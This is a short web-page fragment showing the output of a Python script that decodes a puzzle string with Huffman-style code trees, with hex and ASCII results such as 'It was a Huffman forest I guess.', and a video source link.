</output>
# <code>python mission_03.py</code>
<output>tree = {'11': '1', '0': '2', '100': '0', '101': '3'}
result = 3231202120213111211131203001031030012101202131112031322131303001323130113211313131312111030030013010300120213011212030012101031
dec = 26860288614901905570716094189682157357950360778336264927367113021610209076301
bytes = 3b6262756576304d30646275637a77307b71797777654c30713062716630644d
ascii = Md0fqb0q0Lewwyq{0wzcubd0M0veubb;
tree = {'11': '1', '0': '3', '100': '0', '101': '2'}
result = 2321303130312111311121302001021020013101303121113021233121202001232120112311212121213111020020012010200130312011313020013101021
dec = 21010374883428224108739011194252932925839770786883498221738205492211234141257
bytes = 2e7373657567204920747365726f66206e616d66667548206120736177207449
ascii = It was a Huffman forest I guess.
</output></pre><br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=iwRSFlZoSCM (1:26:42)